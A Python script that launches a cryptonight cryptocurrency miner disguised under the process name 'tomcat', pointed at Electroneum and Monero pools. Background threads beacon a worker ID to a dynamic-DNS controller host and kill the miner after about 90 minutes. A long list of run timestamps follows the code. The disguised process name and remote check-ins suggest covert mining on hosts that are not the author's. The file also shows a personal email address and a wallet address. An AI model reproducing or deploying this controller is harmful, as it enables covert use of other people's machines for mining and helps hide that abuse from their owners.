import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:23:07.310002
#2018-02-17 16:01:06.560112
#2018-02-17 17:37:07.088123
#2018-02-17 19:12:06.053672
#2018-02-17 20:45:06.104937
#2018-02-17 22:17:06.599966
#2018-02-17 23:50:01.324051
#2018-02-18 01:27:08.687136
#2018-02-18 02:58:08.432054
#2018-02-18 04:35:08.634070
#2018-02-18 06:16:02.139914
#2018-02-18 08:08:06.246217
#2018-02-18 09:40:06.349048
#2018-02-18 11:11:01.931824
#2018-02-18 12:45:05.796328
#2018-02-18 14:18:07.865519
#2018-02-18 15:54:06.997799
#2018-02-18 17:26:02.131590
#2018-02-18 18:58:05.339950
#2018-02-18 20:30:07.133190
#2018-02-18 22:01:06.549650
#2018-02-18 23:38:05.653617
#2018-02-19 01:11:06.013714
#2018-02-19 02:44:06.952917
#2018-02-19 04:16:07.314950
#2018-02-19 05:48:06.767133
#2018-02-19 07:25:08.464068
#2018-02-19 08:59:02.000697
#2018-02-19 10:34:07.402835
#2018-02-19 12:06:08.323885
#2018-02-19 13:37:09.099111
#2018-02-19 15:12:08.066725
#2018-02-19 16:44:07.329387
#2018-02-19 18:16:10.470434
#2018-02-19 19:52:05.116114
#2018-02-19 21:27:07.997897
#2018-02-19 23:00:08.017068
#2018-02-20 00:28:07.470744
#2018-02-20 02:06:05.824172
#2018-02-20 03:40:03.881543
#2018-02-20 05:11:05.363642
#2018-02-20 06:40:05.851606
#2018-02-20 08:15:08.914116
#2018-02-20 09:49:04.066404
#2018-02-20 11:19:07.091788
#2018-02-20 12:56:07.008195
#2018-02-20 14:28:07.501075
#2018-02-20 15:59:06.667647
#2018-02-20 17:36:09.130239
#2018-02-20 19:14:07.941147
#2018-02-20 20:47:01.843333
#2018-02-20 22:16:05.434883
#2018-02-20 23:44:09.271064
#2018-02-21 01:24:03.545804
#2018-02-21 02:59:07.407763
#2018-02-21 04:35:05.255577
#2018-02-21 06:09:05.194952
#2018-02-21 07:44:01.468148
#2018-02-21 09:14:05.125139
#2018-02-21 10:51:08.529185
#2018-02-21 12:24:07.674435
#2018-02-21 13:57:04.933001
#2018-02-21 15:25:03.077366
#2018-02-21 17:06:01.488610
#2018-02-21 18:39:01.254508
#2018-02-21 20:11:01.935674
#2018-02-21 21:45:11.000625
#2018-02-21 23:18:06.268798
#2018-02-22 00:53:07.875316
#2018-02-22 02:26:05.305191
#2018-02-22 03:59:07.634720
#2018-02-22 05:32:08.026989
#2018-02-22 07:04:08.560737
#2018-02-22 08:40:07.451104
#2018-02-22 10:13:07.327280
#2018-02-22 11:45:06.753005
#2018-02-22 13:20:01.296913
#2018-02-22 14:57:06.027982
#2018-02-22 16:27:09.262485
#2018-02-22 18:01:12.667875
#2018-02-22 19:36:02.017229
#2018-02-22 21:14:07.548845
#2018-02-22 22:42:04.142523
#2018-02-23 00:16:03.658163
#2018-02-23 01:51:01.267660
#2018-02-23 03:22:03.883472
#2018-02-23 04:56:04.931705
#2018-02-23 06:30:09.366023
#2018-02-23 08:13:02.015145
#2018-02-23 10:14:07.958530
#2018-02-23 11:41:07.445006
#2018-02-23 13:04:01.304531
#2018-02-23 14:27:07.957803
#2018-02-23 16:08:08.313162
#2018-02-23 17:35:10.019550
#2018-02-23 19:10:09.191532
#2018-02-23 20:44:08.061649
#2018-02-23 22:19:04.143219
#2018-02-23 23:52:05.500506
#2018-02-24 01:26:07.839650
#2018-02-24 03:02:01.362985
#2018-02-24 04:38:04.063805
#2018-02-24 06:09:04.082233
#2018-02-24 07:44:08.492787
#2018-02-24 09:17:03.588353
#2018-02-24 10:59:04.949581
#2018-02-24 12:29:06.454908
#2018-02-24 14:02:07.534963
#2018-02-24 15:37:05.126737
#2018-02-24 17:20:06.466712
#2018-02-24 18:50:07.711751
#2018-02-24 20:21:05.903001
#2018-02-24 21:50:06.773887
#2018-02-25 01:52:03.788109
#2018-02-25 04:57:07.923498
#2018-02-25 09:31:01.523404